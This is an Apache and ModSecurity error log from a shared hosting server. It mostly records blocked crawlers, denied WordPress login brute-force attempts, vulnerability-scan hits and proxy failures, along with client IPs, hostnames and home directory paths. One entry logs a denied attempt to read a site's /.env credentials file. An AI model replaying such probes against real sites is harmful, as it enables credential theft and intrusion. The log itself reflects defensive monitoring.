[Tue May 26 13:14:23.295713 2026] [security2:error] [pid 501489:tid 501684] [client 180.242.194.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPVmkFNZ9cRlz80Ii4_AAAAMU"]
[Tue May 26 13:14:23.320220 2026] [security2:error] [pid 501489:tid 501732] [client 216.244.66.241:49412] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/miryfffa/bdafaa2440097.shtml"] [unique_id "ahVPV2kFNZ9cRlz80Ii5FgAAAPI"]
[Tue May 26 13:14:23.320337 2026] [security2:error] [pid 501489:tid 501732] [client 216.244.66.241:49412] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/miryfffa/bdafaa2440097.shtml"] [unique_id "ahVPV2kFNZ9cRlz80Ii5FgAAAPI"]
[Tue May 26 13:14:23.724133 2026] [security2:error] [pid 501489:tid 501632] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPV2kFNZ9cRlz80Ii5GAAAAJI"]
[Tue May 26 13:14:24.297863 2026] [security2:error] [pid 501489:tid 501657] [client 173.239.240.46:48165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVPWGkFNZ9cRlz80Ii5MwAAAKo"]
[Tue May 26 13:14:24.350694 2026] [proxy:error] [pid 501489:tid 501507] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:24.350770 2026] [proxy_http:error] [pid 501489:tid 501507] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:24.351357 2026] [proxy:error] [pid 501489:tid 501507] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:24.351391 2026] [proxy_http:error] [pid 501489:tid 501507] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:25.663246 2026] [security2:error] [pid 501489:tid 501620] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPWWkFNZ9cRlz80Ii5jAAAAIY"]
[Tue May 26 13:14:26.066138 2026] [proxy:error] [pid 501489:tid 501568] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:26.066242 2026] [proxy_http:error] [pid 501489:tid 501568] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:26.067015 2026] [proxy:error] [pid 501489:tid 501568] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:26.067088 2026] [proxy_http:error] [pid 501489:tid 501568] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:28.078345 2026] [security2:error] [pid 501489:tid 501635] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPW2kFNZ9cRlz80Ii53QAAAJU"]
[Tue May 26 13:14:28.766247 2026] [proxy:error] [pid 501489:tid 501560] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:28.766317 2026] [proxy_http:error] [pid 501489:tid 501560] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:28.766925 2026] [proxy:error] [pid 501489:tid 501560] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:28.766971 2026] [proxy_http:error] [pid 501489:tid 501560] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:28.768085 2026] [autoindex:error] [pid 501489:tid 501672] [client 45.148.10.16:53738] AH01276: Cannot serve directory /home2/azurm42s/public_html/erptrn.azurmediatec.com/: No matching DirectoryIndex (index.php,index.html,index.htm) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:14:29.635676 2026] [security2:error] [pid 501489:tid 501563] [remote 217.112.89.35:41930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVPXWkFNZ9cRlz80Ii6FAAA00k"]
[Tue May 26 13:14:30.706174 2026] [security2:error] [pid 501489:tid 501746] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPXmkFNZ9cRlz80Ii6MAAAAP8"]
[Tue May 26 13:14:33.582606 2026] [security2:error] [pid 501489:tid 501715] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPYWkFNZ9cRlz80Ii6dgAAAOQ"]
[Tue May 26 13:14:33.734385 2026] [security2:error] [pid 501489:tid 501630] [client 91.242.236.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPYWkFNZ9cRlz80Ii6hQAAAJA"], referer: https://www.anujtradingco.com/
[Tue May 26 13:14:34.398540 2026] [security2:error] [pid 501489:tid 501625] [client 114.119.138.185:54531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/isparta-web-tasarim/"] [unique_id "ahVPYmkFNZ9cRlz80Ii6mgAAAIs"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 13:14:34.720840 2026] [security2:error] [pid 501489:tid 501665] [client 91.242.236.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPYmkFNZ9cRlz80Ii6owAAALI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 13:14:35.680922 2026] [security2:error] [pid 501489:tid 501713] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPY2kFNZ9cRlz80Ii6vwAAAOI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1218096&moderation-hash=0a6cece0db833b873f7e0b1eaf6b5863
[Tue May 26 13:14:35.928616 2026] [security2:error] [pid 501489:tid 501662] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPY2kFNZ9cRlz80Ii6uQAAAK8"]
[Tue May 26 13:14:36.590030 2026] [security2:error] [pid 501489:tid 501750] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPZGkFNZ9cRlz80Ii64gAAAQM"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1218096&moderation-hash=0a6cece0db833b873f7e0b1eaf6b5863
[Tue May 26 13:14:37.882128 2026] [security2:error] [pid 501489:tid 501738] [client 23.226.223.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVPZWkFNZ9cRlz80Ii6-AAAAPc"]
[Tue May 26 13:14:38.514043 2026] [security2:error] [pid 501489:tid 501733] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPZmkFNZ9cRlz80Ii7DAAAAPM"]
[Tue May 26 13:14:38.937104 2026] [security2:error] [pid 501489:tid 501687] [client 91.242.236.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPZmkFNZ9cRlz80Ii7JwAAAMg"], referer: https://anujtradingco.com
[Tue May 26 13:14:39.445894 2026] [authz_core:error] [pid 501489:tid 501672] [client 176.65.139.232:54748] AH01630: client denied by server configuration: /home2/azurm42s/public_html/systemprintsn.com/.env
[Tue May 26 13:14:41.032056 2026] [security2:error] [pid 501489:tid 501741] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPaGkFNZ9cRlz80Ii7XQAAAPo"]
[Tue May 26 13:14:43.240070 2026] [security2:error] [pid 501489:tid 501591] [remote 74.7.241.58:54314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVPa2kFNZ9cRlz80Ii7mgAAyGU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:14:43.447742 2026] [security2:error] [pid 501489:tid 501649] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPa2kFNZ9cRlz80Ii7kAAAAKI"]
[Tue May 26 13:14:43.662879 2026] [security2:error] [pid 501489:tid 501634] [client 146.174.164.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPa2kFNZ9cRlz80Ii7mQAAAJQ"]
[Tue May 26 13:14:45.325064 2026] [security2:error] [pid 501489:tid 501700] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPbGkFNZ9cRlz80Ii70AAAANU"]
[Tue May 26 13:14:47.633711 2026] [security2:error] [pid 501489:tid 501507] [remote 217.112.89.35:46420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVPb2kFNZ9cRlz80Ii8EwAApxE"]
[Tue May 26 13:14:48.411713 2026] [security2:error] [pid 501489:tid 501727] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPb2kFNZ9cRlz80Ii8HgAAAO4"]
[Tue May 26 13:14:48.506232 2026] [security2:error] [pid 501489:tid 501710] [client 216.244.66.241:43620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/craggedabec/fffaad1321948.shtml"] [unique_id "ahVPcGkFNZ9cRlz80Ii8JwAAAN8"]
[Tue May 26 13:14:48.506390 2026] [security2:error] [pid 501489:tid 501710] [client 216.244.66.241:43620] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/craggedabec/fffaad1321948.shtml"] [unique_id "ahVPcGkFNZ9cRlz80Ii8JwAAAN8"]
[Tue May 26 13:14:51.088161 2026] [security2:error] [pid 501489:tid 501732] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPcmkFNZ9cRlz80Ii8UwAAAPI"]
[Tue May 26 13:14:52.786878 2026] [security2:error] [pid 501489:tid 501665] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPdGkFNZ9cRlz80Ii8gAAAALI"]
[Tue May 26 13:14:55.943511 2026] [security2:error] [pid 501489:tid 501711] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPd2kFNZ9cRlz80Ii8zAAAAOA"]
[Tue May 26 13:14:58.816459 2026] [security2:error] [pid 501489:tid 501533] [remote 95.216.117.13:49572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVPemkFNZ9cRlz80Ii9DwAA7ys"]
[Tue May 26 13:14:58.867831 2026] [security2:error] [pid 501489:tid 501625] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPemkFNZ9cRlz80Ii9CAAAAIs"]
[Tue May 26 13:15:00.579174 2026] [security2:error] [pid 501489:tid 501720] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPfGkFNZ9cRlz80Ii9OgAAAOk"]
[Tue May 26 13:15:03.186743 2026] [security2:error] [pid 501489:tid 501655] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPfmkFNZ9cRlz80Ii9fgAAAKg"]
[Tue May 26 13:15:05.606723 2026] [security2:error] [pid 501489:tid 501715] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPgWkFNZ9cRlz80Ii9uwAAAOQ"]
[Tue May 26 13:15:07.745035 2026] [proxy:error] [pid 501489:tid 501750] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:15:07.745088 2026] [proxy_http:error] [pid 501489:tid 501750] [client 185.169.4.152:54972] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 13:15:07.745779 2026] [proxy:error] [pid 501489:tid 501750] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:15:07.745814 2026] [proxy_http:error] [pid 501489:tid 501750] [client 185.169.4.152:54972] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 13:15:08.057764 2026] [security2:error] [pid 501489:tid 501692] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPg2kFNZ9cRlz80Ii98QAAAM0"]
[Tue May 26 13:15:10.069733 2026] [security2:error] [pid 501489:tid 501620] [client 113.181.232.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPhWkFNZ9cRlz80Ii-JgAAAIY"]
[Tue May 26 13:15:10.570753 2026] [security2:error] [pid 501489:tid 501648] [client 185.191.171.3:11380] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVPhmkFNZ9cRlz80Ii-QgAAAKE"]
[Tue May 26 13:15:10.570878 2026] [security2:error] [pid 501489:tid 501648] [client 185.191.171.3:11380] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVPhmkFNZ9cRlz80Ii-QgAAAKE"]
[Tue May 26 13:15:10.918431 2026] [security2:error] [pid 501489:tid 501714] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPhmkFNZ9cRlz80Ii-PwAAAOM"]
[Tue May 26 13:15:11.709681 2026] [security2:error] [pid 501489:tid 501565] [remote 46.101.54.125:36266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVPh2kFNZ9cRlz80Ii-VQAA_Us"]
[Tue May 26 13:15:12.746458 2026] [security2:error] [pid 501489:tid 501633] [client 128.140.106.114:24268] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVPiGkFNZ9cRlz80Ii-gQAAAJM"], referer: http://ucdc.co.in/
[Tue May 26 13:15:13.049645 2026] [security2:error] [pid 501489:tid 501637] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPiGkFNZ9cRlz80Ii-fwAAAJc"]
[Tue May 26 13:15:14.994773 2026] [security2:error] [pid 501489:tid 501644] [client 172.225.77.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVPimkFNZ9cRlz80Ii-swAAAJ4"]
[Tue May 26 13:15:15.396350 2026] [security2:error] [pid 501489:tid 501663] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPimkFNZ9cRlz80Ii-vAAAALA"]
[Tue May 26 13:15:17.957735 2026] [security2:error] [pid 501489:tid 501667] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPjWkFNZ9cRlz80Ii-9AAAALQ"]
[Tue May 26 13:15:20.488429 2026] [security2:error] [pid 501489:tid 501681] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPkGkFNZ9cRlz80Ii_LAAAAMI"]
[Tue May 26 13:15:22.452825 2026] [security2:error] [pid 501489:tid 501685] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPkmkFNZ9cRlz80Ii_bgAAAMY"]
[Tue May 26 13:15:25.013712 2026] [security2:error] [pid 501489:tid 501742] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPlGkFNZ9cRlz80Ii_qgAAAPs"]
[Tue May 26 13:15:27.869809 2026] [security2:error] [pid 501489:tid 501723] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPl2kFNZ9cRlz80Ii__gAAAOs"]
[Tue May 26 13:15:28.811817 2026] [security2:error] [pid 501489:tid 501503] [remote 121.200.216.55:51786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVPmGkFNZ9cRlz80IjAHQAA9A0"]
[Tue May 26 13:15:28.970408 2026] [security2:error] [pid 501489:tid 501628] [client 114.119.155.203:60077] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bramas.in"] [uri "/robots.txt"] [unique_id "ahVPmGkFNZ9cRlz80IjAJAAAAI4"]
[Tue May 26 13:15:30.218361 2026] [security2:error] [pid 501489:tid 501742] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPmWkFNZ9cRlz80IjAOQAAAPs"]
[Tue May 26 13:15:34.619306 2026] [security2:error] [pid 501489:tid 501632] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPnmkFNZ9cRlz80IjAngAAAJI"]
[Tue May 26 13:15:34.952928 2026] [security2:error] [pid 501489:tid 501724] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPnmkFNZ9cRlz80IjApwAAAOw"]
